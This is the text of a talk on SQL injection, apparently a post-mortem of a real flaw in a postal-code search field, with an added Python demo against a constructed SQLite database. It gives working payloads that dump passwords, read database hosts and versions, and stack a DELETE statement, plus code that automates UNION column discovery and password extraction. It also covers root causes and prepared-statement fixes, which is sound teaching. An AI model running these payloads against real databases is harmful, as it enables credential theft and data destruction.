Who's Afraid of SQL Injection?! Mike Kölbl, Sonja Klausburg, Siegfried Goeschl


http://xkcd.com/327/

What Is SQL Injection?
Incorrectly validated or unvalidated user input is concatenated into a dynamically built SQL statement as a string literal, and the SQL engine interprets the resulting text as code rather than as data.

Why SQL Injection?
- Get access to a different user account
- Find data you are not allowed to see
- Become a DBA without a job promotion
- Infiltrate other backend servers, assuming you are a really bad guy

Categories of Attacks
- SQL Manipulation
- Code Injection
- Function Call Injection
- Buffer Overflows

SQL Manipulation
Original statement:
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'
After injecting mypassword' or 'a' = 'a into the password field:
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a'
Because AND binds tighter than OR, the condition reads (username = 'bob' AND PASSWORD = 'mypassword') OR 'a' = 'a', so the WHERE clause is true for every row.

SQL Manipulation
Original statement:
SELECT product_name FROM all_products WHERE product_name like '%Chairs%'
After injecting Chairs' UNION SELECT username FROM dba_users WHERE username like '% into the search field:
SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%'
The SQL statement now returns rows from another table. A UNION only works when the injected SELECT has the same number of columns, with compatible types, as the original one.

Code Injection
Original statement:
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword';
After injecting a second (stacked) statement:
SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM users WHERE username = 'admin';
Does not work with Oracle (easily): the Oracle client interfaces execute one statement per call and reject stacked statements, unlike, for example, MS SQL Server.

Function Call Injection
Original statement:
SELECT TRANSLATE('user input', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual;
After injecting a call to a built-in package into the literal:
SELECT TRANSLATE('' || UTL_HTTP.REQUEST('http://192.168.1.1/') || '', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual;
UTL_HTTP.REQUEST takes a URL as its argument and returns up to the first 2000 bytes of data retrieved from that URL, so the database server itself makes the HTTP request.

Are You Afraid of SQL Injection?!

You Had Better Be

First Contact
The first probe sent to the postal-code field of the search form:
'; --

Hello World
' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1='
The injected SELECT supplies 17 columns to match the application's query; 'Hello World' sits in the sixth column, which the page renders as the company name. The trailing OR 1=' absorbs the closing quote of the original statement.

Password Helper
' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1='
Same shape as the Hello World payload, but the sixth column now carries the PASSWORD column of TABLE_USER for the chosen login. The statement the application actually executes:
select table_x_site_search.x_site_objid, x_bo_status, x_bo_x_sales_segment,
  x_bo_org_id, x_b_x_ban_id,
  x_company_name, x_a_address, x_a_zipcode, x_a_city,
  x_ctry_name, x_ctry_x_iso_code_2l,
  x_b_x_firmenbuchnummer, x_b_x_uid_number,
  x_e_first_name, x_e_last_name,
  x_e_e_mail, x_user_login_name
from table_x_site_search, table_bus_org
where table_x_site_search.x_bo_org_id = table_bus_org.org_id
  and x_s_company_name like 'MO%'
  and x_ctry_x_iso_code_2l = 'AT'
  and upper(x_a_s_address) like 'ER%'
  and x_a_zipcode = '' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('MKPE9R') OR 1=''
  and rownum <= 200
The postal-code literal is where the input lands; everything from UNION onwards is attacker-controlled, and the password is displayed in the company-name field of the result list.

DB Host Lookup
' UNION SELECT 1,0,'','','',S.MACHINE,'','','','','','','','','','','' FROM V$SESSION S, V$PROCESS P WHERE P.SPID = S.PROCESS AND MACHINE IS NOT NULL OR 1='
Lists the machine names of connected sessions, which reveals the application and database hosts. Works only if the application's database account may read the V$ views.

Get Oracle Version
' UNION SELECT 1,0,'','','',VERSION,'','','','','','','','','','','' FROM DBA_REGISTRY WHERE COMP_ID = 'CATALOG' OR 1='
Reads the catalog component version from DBA_REGISTRY, a DBA view; the exact version tells the attacker which published exploits apply.

Oracle Cheat Sheet
- List users and password hashes; checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10
- List all databases, tables and columns
- Local file access using UTL_FILE
- Make DNS requests

Cool Oracle Exploits
- raptor_oraextproc.sql: directory traversal vulnerability in extproc
- raptor_oraexec.sql: exploitation suite for Oracle written in Java, to read/write files and execute OS commands
- raptor_orafile.sql: file system access suite for Oracle based on the utl_file package, to read/write files

Root Cause Analysis
- Affects CUSI I29 and I30-dev
- RegExp validation for PLZ (postal code) is broken
- Input field is not truncated
- No SQL escaping of the query parameter
- A literal SQL statement is built from the input instead of a bound parameter
- Passwords are not always encrypted

How To Avoid
- Prepared Statements (bind parameters instead of concatenated literals)
- Test for SQL vulnerability
- Code reviews
- Think about security before someone else does it for you
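The probe sequence of the preceding slides (first contact, the 17-column Hello World, the Password Helper) and the prepared-statement fix from this slide, as an added worked example; this is not code from the talk. It assumes SQLite standing in for Oracle (a one-row table plays DUAL, rowid plays rownum), a schema cut down to 5 of the original 17 columns, constructed sample rows, and a 4-5 digit allow-list for the PLZ field.

```python
"""Added example: slides 12-18 automated against a constructed SQLite stand-in,
then the fix from slide 25. Assumptions: SQLite instead of Oracle, a 'dual' table
in place of DUAL, rowid in place of rownum, 5 columns instead of 17, made-up rows."""
import re
import sqlite3


def make_db():
    """Constructed sample data; table and column names mirror the talk's query."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE table_x_site_search(x_site_objid INTEGER, x_bo_status INTEGER,
            x_company_name TEXT, x_a_city TEXT, x_a_zipcode TEXT);
        CREATE TABLE table_user(login_name TEXT, password TEXT);
        CREATE TABLE dual(dummy TEXT);  -- stands in for Oracle's DUAL
        INSERT INTO table_x_site_search VALUES (1, 0, 'Mobil AG', 'Wien', '1010');
        INSERT INTO table_x_site_search VALUES (2, 0, 'Montan GmbH', 'Graz', '8010');
        INSERT INTO table_user VALUES ('mkpe9r', 's3cret');
        INSERT INTO table_user VALUES ('admin', 'Tr0ub4dor');
        INSERT INTO dual VALUES ('X');
    """)
    return db


def search_vulnerable(db, zipcode):
    """Slide 19's pattern: the user's literal is concatenated into the statement."""
    sql = ("SELECT x_site_objid, x_bo_status, x_company_name, x_a_city, x_a_zipcode "
           "FROM table_x_site_search WHERE x_a_zipcode = '" + zipcode + "' AND rowid <= 200")
    return db.execute(sql).fetchall()


def search_bound(db, zipcode):
    """Slide 25's fix: a bind parameter, so the payload can only ever be a zipcode value."""
    sql = ("SELECT x_site_objid, x_bo_status, x_company_name, x_a_city, x_a_zipcode "
           "FROM table_x_site_search WHERE x_a_zipcode = ? AND rowid <= 200")
    return db.execute(sql, (zipcode,)).fetchall()


ZIPCODE_RE = re.compile(r"[0-9]{4,5}")  # allow-list for the PLZ field (4-5 digits assumed)


def valid_zipcode(value):
    """Defence in depth for slide 24's broken RegExp: fullmatch, so a trailing payload fails."""
    return ZIPCODE_RE.fullmatch(value) is not None


def first_contact(query):
    """Slide 13: a lone quote that reaches the parser gives the tell-tale syntax error."""
    try:
        query("'")
        return False
    except sqlite3.OperationalError:
        return True


def find_column_count(query, max_cols=32):
    """Slide 15 automated: UNION needs matching column counts, so grow a list of NULLs
    until the engine stops complaining."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + " FROM dual WHERE 1=1 OR 1='"
        try:
            query(payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_payload(ncols, pos, expr, source, where="1=1"):
    """Slides 15-18: place expr in column pos (1-based) of an ncols-wide UNION SELECT;
    the trailing OR 1=' swallows the closing quote of the original statement."""
    cols = ["1", "0"] + ["''"] * (ncols - 2)
    cols[pos - 1] = expr
    return "' UNION SELECT " + ",".join(cols) + " FROM " + source + " WHERE " + where + " OR 1='"


def demo():
    db = make_db()

    def vuln(payload):
        return search_vulnerable(db, payload)

    n = find_column_count(vuln)                          # 5 here, 17 in the talk
    hello = union_payload(n, 3, "'Hello World'", "dual")
    pw = union_payload(n, 3, "password", "table_user", "login_name = LOWER('MKPE9R')")
    return {
        "first_contact": first_contact(vuln),
        "columns": n,
        "tautology_rows": len(vuln("' OR 'a'='a")),     # slide 6: every row comes back
        "hello_world": vuln(hello),                      # text shows up in company name
        "password": vuln(pw),                            # so does the password
        "bound": search_bound(db, hello),                # []: payload treated as data
        "regexp_blocks": not valid_zipcode(hello) and valid_zipcode("1010"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The column-count probe is the generalisation of the manual step on the Hello World slide; the bind-parameter version of the same query returns nothing for the payload because the driver never lets it reach the SQL parser, and the regular expression is only a second line of defence, not a substitute for binding.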

Why would this not happen to you?!

Questions and Answers

Resources
- http://www.net-security.org/dl/articles/integrigyintrotosqlinjectionattacks.pdf
- http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
- http://www.0xdeadbeef.info/
- http://www.red-database-security.com/exploits/oracle_10g_exploits.html